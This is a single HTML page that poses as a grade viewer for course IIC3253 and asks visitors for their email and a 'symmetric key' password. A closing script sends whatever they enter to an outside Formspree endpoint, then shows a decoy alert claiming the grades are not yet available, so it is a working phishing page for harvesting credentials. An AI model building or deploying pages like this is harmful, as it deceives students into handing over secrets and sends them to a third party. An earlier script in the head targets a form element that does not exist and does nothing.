<!-- Default html -->
<!DOCTYPE html>
<html lang="en">

<head>
    <title>Regalo Pablo</title>
    <script>
        function loading() {
          document.getElementById('login-form').innerHTML = 'Cargando...';
        }
      
        function showAlert() {
          alert('Las notas aun no estan disponibles');
        }
      
        document.getElementById('login-form').addEventListener('submit', function(event) {
          event.preventDefault();
          loading();
          setTimeout(showAlert, 5000);
        });
    </script>
      
    <style>
        body {
            font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
            font-size: 14px;
            line-height: 1.42857143;
            color: #333;
            background-color: #f5f5f5;
        }

        .wrapper {
            max-width: 400px;
            margin: 0 auto;
            padding-top: 80px;
        }

        .form-signin {
            max-width: 330px;
            padding: 15px;
            margin: 0 auto;
            background-color: #fff;
            border: 1px solid #e5e5e5;
            border-radius: 4px;
            box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
        }

        .form-signin .form-signin-heading,
        .form-signin .checkbox {
            margin-bottom: 20px;
        }

        .form-signin input[type="text"],
        .form-signin input[type="password"] {
            font-size: 16px;
            height: auto;
            margin-bottom: 15px;
            padding: 7px 9px;
        }

        .checkbox {
            font-weight: normal;
        }

        .btn {
            display: inline-block;
            margin-bottom: 0;
            font-weight: 400;
            text-align: center;
            vertical-align: middle;
            cursor: pointer;
            background-image: none;
            border: 1px solid transparent;
            white-space: nowrap;
            padding: 6px 12px;
            font-size: 14px;
            line-height: 1.42857143;
            border-radius: 4px;
        }

        .btn-primary {
            color: #fff;
            background-color: #4078c0;
            border-color: #4078c0;
        }

        .btn-primary:hover,
        .btn-primary:focus,
        .btn-primary:active,
        .btn-primary.active,
        .open .dropdown-toggle.btn-primary {
            color: #fff;
            background-color: #2a65a0;
            border-color: #245682;
        }

        .btn-primary:active,
        .btn-primary.active,
        .open .dropdown-toggle.btn-primary {
            background-image: none;
        }

        .btn-block {
            display: block;
            width: 100%;
        }
    </style>
</head>

<body>
    <div class="wrapper">
        <form
            id="contact-form"
            class="form-signin"
            >
            <h2 class="form-signin-heading">[IIC3253] Visualizador de notas</h2>
            <input type="text" class="form-control" name="username" placeholder="Ingresa correo electronico" required=""
                autofocus="" />
            <input type="password" class="form-control" name="password" placeholder="Ingresa llave simetrica" required="" />
            <input class="btn btn-lg btn-primary btn-block" type="submit" value="Ver">
        </form>
    </div>
</body>

<script>
    const form = document.getElementById('contact-form');
    form.addEventListener('submit', (event) => {
      event.preventDefault();
      const formData = new FormData(event.target);
      const xhr = new XMLHttpRequest();
      xhr.open('POST', "https://formspree.io/f/mlekragv", true);
      xhr.setRequestHeader('Accept', 'application/json');
      xhr.onreadystatechange = function() {
        if (xhr.readyState !== XMLHttpRequest.DONE) return;
        if (xhr.status === 200) {
          alert('Las notas aun no estan disponibles');
          form.reset();
        } else {
          alert('Ocurrió un error. Por favor inténtelo de nuevo más tarde.');
        }
      };
      xhr.send(formData);
    });
  </script>
  

</html>